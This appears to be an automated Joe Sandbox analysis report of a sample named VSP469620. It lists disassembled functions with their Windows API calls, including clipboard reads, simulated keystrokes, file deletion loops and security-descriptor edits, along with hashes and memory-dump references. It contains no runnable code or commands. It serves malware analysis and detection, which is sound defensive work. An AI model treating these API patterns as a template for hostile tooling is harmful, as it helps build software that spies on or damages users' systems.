                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F
                                                              • API String ID: 2516578528-4164748364
                                                              • Opcode ID: 1958a581b6a2ade02b81c3593ef2c1dffd2860cec3a8b75bb9fea964a479356a
                                                              • Instruction ID: 7505158b5f1ca915ddb21fed0cb0c87c048f848a462fbe76354c2cdee719426e
                                                              • Opcode Fuzzy Hash: 1958a581b6a2ade02b81c3593ef2c1dffd2860cec3a8b75bb9fea964a479356a
                                                              • Instruction Fuzzy Hash: C032CE74604246EFDB10CF28C884BBABBE8FF49354F540AA9F659872A1CB31DD91CB51
                                                              Function 00B1AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B1B1CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: %d/%02d/%02d
                                                              • API String ID: 3850602802-328681919
                                                              • Opcode ID: d8e2f89a749c99413e7bd78ef99d7e152262878c9ba5bff743f0d8050470af28
                                                              • Instruction ID: 04a9e8e38c50d91f6c45a260f748cb232a1dbe1ee84b80ae691d9d46b1c6403b
                                                              • Opcode Fuzzy Hash: d8e2f89a749c99413e7bd78ef99d7e152262878c9ba5bff743f0d8050470af28
                                                              • Instruction Fuzzy Hash: 8B12BD71500208ABEB248F64DD89FEE7BF8EF45710F6041A9F919EB2D1DB709981CB51
                                                              Function 00ACEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 00ACEB4A
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B23AEA
                                                              • IsIconic.USER32(000000FF), ref: 00B23AF3
                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00B23B00
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00B23B0A
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B23B20
                                                              • GetCurrentThreadId.KERNEL32 ref: 00B23B27
                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00B23B33
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B23B44
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B23B4C
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B23B54
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00B23B57
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B23B6C
                                                              • keybd_event.USER32(00000012,00000000), ref: 00B23B77
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B23B81
                                                              • keybd_event.USER32(00000012,00000000), ref: 00B23B86
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B23B8F
                                                              • keybd_event.USER32(00000012,00000000), ref: 00B23B94
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B23B9E
                                                              • keybd_event.USER32(00000012,00000000), ref: 00B23BA3
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00B23BA6
                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B23BCD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: 4070908aa53998533c0cb39019c85a54bff690cfce4651167c1fddd756c225b5
                                                              • Instruction ID: 7ae74806a99218b6052c0c31c6cc3c1f40d1aa60dae5c05cb21d3a78c0cdb84b
                                                              • Opcode Fuzzy Hash: 4070908aa53998533c0cb39019c85a54bff690cfce4651167c1fddd756c225b5
                                                              • Instruction Fuzzy Hash: B531A571A40218BBEB205F75AC4AF7F3EACEB44B50F214055FA05EB1D0DAB55D00AAA0
                                                              Function 00AF60DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AF5FA6,?), ref: 00AF6ED8
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AF5FA6,?), ref: 00AF6EF1
                                                                • Part of subcall function 00AF725E: __wsplitpath.LIBCMT ref: 00AF727B
                                                                • Part of subcall function 00AF725E: __wsplitpath.LIBCMT ref: 00AF728E
                                                                • Part of subcall function 00AF72CB: GetFileAttributesW.KERNEL32(?,00AF6019), ref: 00AF72CC
                                                              • _wcscat.LIBCMT ref: 00AF6149
                                                              • _wcscat.LIBCMT ref: 00AF6167
                                                              • __wsplitpath.LIBCMT ref: 00AF618E
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AF61A4
                                                              • _wcscpy.LIBCMT ref: 00AF6209
                                                              • _wcscat.LIBCMT ref: 00AF621C
                                                              • _wcscat.LIBCMT ref: 00AF622F
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00AF625D
                                                              • DeleteFileW.KERNEL32(?), ref: 00AF626E
                                                              • MoveFileW.KERNEL32(?,?), ref: 00AF6289
                                                              • MoveFileW.KERNEL32(?,?), ref: 00AF6298
                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 00AF62AD
                                                              • DeleteFileW.KERNEL32(?), ref: 00AF62BE
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AF62E1
                                                              • FindClose.KERNEL32(00000000), ref: 00AF62FD
                                                              • FindClose.KERNEL32(00000000), ref: 00AF630B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                              • String ID: \*.*$p1Mw`KNw
                                                              • API String ID: 1917200108-2160596699
                                                              • Opcode ID: ba0e90bf4f39257403e8f9d3a4cf9e0511c09680dba3b2febec0413c34af844c
                                                              • Instruction ID: d6cfd2e7e096cf2c48b4e405a854e42497fcc3a4ecbb3b88a33d3c328dd5de48
                                                              • Opcode Fuzzy Hash: ba0e90bf4f39257403e8f9d3a4cf9e0511c09680dba3b2febec0413c34af844c
                                                              • Instruction Fuzzy Hash: 36510B7290811C6ACB21EBA1DD44EEF77BCAF05300F0905E6F685A3141DE369B898FA4
                                                              Function 00B06B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenClipboard.USER32(00B4DC00), ref: 00B06B36
                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B06B44
                                                              • GetClipboardData.USER32(0000000D), ref: 00B06B4C
                                                              • CloseClipboard.USER32 ref: 00B06B58
                                                              • GlobalLock.KERNEL32(00000000), ref: 00B06B74
                                                              • CloseClipboard.USER32 ref: 00B06B7E
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00B06B93
                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00B06BA0
                                                              • GetClipboardData.USER32(00000001), ref: 00B06BA8
                                                              • GlobalLock.KERNEL32(00000000), ref: 00B06BB5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00B06BE9
                                                              • CloseClipboard.USER32 ref: 00B06CF6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                              • String ID:
                                                              • API String ID: 3222323430-0
                                                              • Opcode ID: d6e870ade6039482aa0860a2ff61247d9ab261d63b5773a2c344b8d3950747ae
                                                              • Instruction ID: 2ed0919652e7beb5e379ff472ed9a018bef75d7b0cc9701b45103e4b4237107c
                                                              • Opcode Fuzzy Hash: d6e870ade6039482aa0860a2ff61247d9ab261d63b5773a2c344b8d3950747ae
                                                              • Instruction Fuzzy Hash: AC519F71200201ABE310EF65EE86FAE7BE8EF84B10F104569F666D71E1DF70D9158B62
                                                              Function 00AFF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AFF62B
                                                              • FindClose.KERNEL32(00000000), ref: 00AFF67F
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AFF6A4
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AFF6BB
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AFF6E2
                                                              • __swprintf.LIBCMT ref: 00AFF72E
                                                              • __swprintf.LIBCMT ref: 00AFF767
                                                              • __swprintf.LIBCMT ref: 00AFF7BB
                                                                • Part of subcall function 00AD172B: __woutput_l.LIBCMT ref: 00AD1784
                                                              • __swprintf.LIBCMT ref: 00AFF809
                                                              • __swprintf.LIBCMT ref: 00AFF858
                                                              • __swprintf.LIBCMT ref: 00AFF8A7
                                                              • __swprintf.LIBCMT ref: 00AFF8F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 835046349-2428617273
                                                              • Opcode ID: 1d6bbd473a6e4b7f12f923ade3a2ec95c49333885aad1d01a9feee4f4ff0dba7
                                                              • Instruction ID: eb04d161dded74d5ee5129382987cd16cac84e491228eab4b9f689c1a892ac84
                                                              • Opcode Fuzzy Hash: 1d6bbd473a6e4b7f12f923ade3a2ec95c49333885aad1d01a9feee4f4ff0dba7
                                                              • Instruction Fuzzy Hash: 3DA1F0B2508344ABC310EBA4C985EAFB7ECBF98704F44092EF595C7152EB34D949CB62
                                                              Function 00B01B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00B01B50
                                                              • _wcscmp.LIBCMT ref: 00B01B65
                                                              • _wcscmp.LIBCMT ref: 00B01B7C
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00B01B8E
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00B01BA8
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B01BC0
                                                              • FindClose.KERNEL32(00000000), ref: 00B01BCB
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00B01BE7
                                                              • _wcscmp.LIBCMT ref: 00B01C0E
                                                              • _wcscmp.LIBCMT ref: 00B01C25
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B01C37
                                                              • SetCurrentDirectoryW.KERNEL32(00B639FC), ref: 00B01C55
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B01C5F
                                                              • FindClose.KERNEL32(00000000), ref: 00B01C6C
                                                              • FindClose.KERNEL32(00000000), ref: 00B01C7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 1b5c67862b83181a464e883da2833139bb1fb9661a4ed39628223130baf7f757
                                                              • Instruction ID: 0b233c037282f1d0db94f8a3afd9a9aa6098d9fe28a9ec5bec1f767e43b58be8
                                                              • Opcode Fuzzy Hash: 1b5c67862b83181a464e883da2833139bb1fb9661a4ed39628223130baf7f757
                                                              • Instruction Fuzzy Hash: CF31A3325006196BDB24ABB8EC49ADE7BECDF05320F1045D6E915E31D0EB74DE858A64
                                                              Function 00B01C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00B01CAB
                                                              • _wcscmp.LIBCMT ref: 00B01CC0
                                                              • _wcscmp.LIBCMT ref: 00B01CD7
                                                                • Part of subcall function 00AF6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AF6BEF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B01D06
                                                              • FindClose.KERNEL32(00000000), ref: 00B01D11
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00B01D2D
                                                              • _wcscmp.LIBCMT ref: 00B01D54
                                                              • _wcscmp.LIBCMT ref: 00B01D6B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B01D7D
                                                              • SetCurrentDirectoryW.KERNEL32(00B639FC), ref: 00B01D9B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B01DA5
                                                              • FindClose.KERNEL32(00000000), ref: 00B01DB2
                                                              • FindClose.KERNEL32(00000000), ref: 00B01DC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: b9a127fa1b8c35c02c15119664d24629da03f3a2f14b8bbc32390b7b0d8d8a7a
                                                              • Instruction ID: 010d89d293182b58110560707aa586477fb4e6edb919a10a730e46f88779bb91
                                                              • Opcode Fuzzy Hash: b9a127fa1b8c35c02c15119664d24629da03f3a2f14b8bbc32390b7b0d8d8a7a
                                                              • Instruction Fuzzy Hash: EC31E53150061A7BDF14AFA8EC49ADE3BEDDF05320F104AE5E801A31E0DB74DE458A54
                                                              Function 00B0091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 00B009DF
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B009EF
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B009FB
                                                              • __wsplitpath.LIBCMT ref: 00B00A59
                                                              • _wcscat.LIBCMT ref: 00B00A71
                                                              • _wcscat.LIBCMT ref: 00B00A83
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B00A98
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B00AAC
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B00ADE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B00AFF
                                                              • _wcscpy.LIBCMT ref: 00B00B0B
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B00B4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: bd457f9890d1bafb9674bdedda1074d1a4a8733a3c7bc16bee51699292db9b9c
                                                              • Instruction ID: 277ed5e044169f5b707945edba72aa7d0757df0dbf4017ce3a8a0a4a686f9cc9
                                                              • Opcode Fuzzy Hash: bd457f9890d1bafb9674bdedda1074d1a4a8733a3c7bc16bee51699292db9b9c
                                                              • Instruction Fuzzy Hash: F5616A725183059FD710EF64C980AAEB7E8FF89314F04495EF989C7252DB31E945CB92
                                                              Function 00AEA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AEABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00AEABD7
                                                                • Part of subcall function 00AEABBB: GetLastError.KERNEL32(?,00AEA69F,?,?,?), ref: 00AEABE1
                                                                • Part of subcall function 00AEABBB: GetProcessHeap.KERNEL32(00000008,?,?,00AEA69F,?,?,?), ref: 00AEABF0
                                                                • Part of subcall function 00AEABBB: HeapAlloc.KERNEL32(00000000,?,00AEA69F,?,?,?), ref: 00AEABF7
                                                                • Part of subcall function 00AEABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00AEAC0E
                                                                • Part of subcall function 00AEAC56: GetProcessHeap.KERNEL32(00000008,00AEA6B5,00000000,00000000,?,00AEA6B5,?), ref: 00AEAC62
                                                                • Part of subcall function 00AEAC56: HeapAlloc.KERNEL32(00000000,?,00AEA6B5,?), ref: 00AEAC69
                                                                • Part of subcall function 00AEAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AEA6B5,?), ref: 00AEAC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AEA6D0
                                                              • _memset.LIBCMT ref: 00AEA6E5
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AEA704
                                                              • GetLengthSid.ADVAPI32(?), ref: 00AEA715
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00AEA752
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AEA76E
                                                              • GetLengthSid.ADVAPI32(?), ref: 00AEA78B
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AEA79A
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00AEA7A1
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AEA7C2
                                                              • CopySid.ADVAPI32(00000000), ref: 00AEA7C9
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AEA7FA
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AEA820
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AEA834
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: 590f976b6576af2236153e04a0a5339e64ffdc61be1027e56d906601db6ec8ce
                                                              • Instruction ID: e60f4a74cc085ac44a7500e61d988bdefb90ab29085d51e5e84811cc19a64a10
                                                              • Opcode Fuzzy Hash: 590f976b6576af2236153e04a0a5339e64ffdc61be1027e56d906601db6ec8ce
                                                              • Instruction Fuzzy Hash: 10514B71900249ABDF14DFA6DC45AEEBBB9FF14700F148129F911AB290DB34AE05CB61
                                                              Function 00AF63F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AF5FA6,?), ref: 00AF6ED8
                                                                • Part of subcall function 00AF72CB: GetFileAttributesW.KERNEL32(?,00AF6019), ref: 00AF72CC
                                                              • _wcscat.LIBCMT ref: 00AF6441
                                                              • __wsplitpath.LIBCMT ref: 00AF645F
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AF6474
                                                              • _wcscpy.LIBCMT ref: 00AF64A3
                                                              • _wcscat.LIBCMT ref: 00AF64B8
                                                              • _wcscat.LIBCMT ref: 00AF64CA
                                                              • DeleteFileW.KERNEL32(?), ref: 00AF64DA
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AF64EB
                                                              • FindClose.KERNEL32(00000000), ref: 00AF6506
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                              • String ID: \*.*$p1Mw`KNw
                                                              • API String ID: 2643075503-2160596699
                                                              • Opcode ID: 6f621f71748577ec9f7a52ece0c1f914ed3bb16557cc435f268416bea8846ad0
                                                              • Instruction ID: 80de3381a542ede4f7c3464e76cce051640ebc614f63943989db59386337922b
                                                              • Opcode Fuzzy Hash: 6f621f71748577ec9f7a52ece0c1f914ed3bb16557cc435f268416bea8846ad0
                                                              • Instruction Fuzzy Hash: 273150B2408388AAC721EBE48985EEFB7DCAF55314F44092AF6D9C3141EA35D50987A7
                                                              Function 00AB6F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
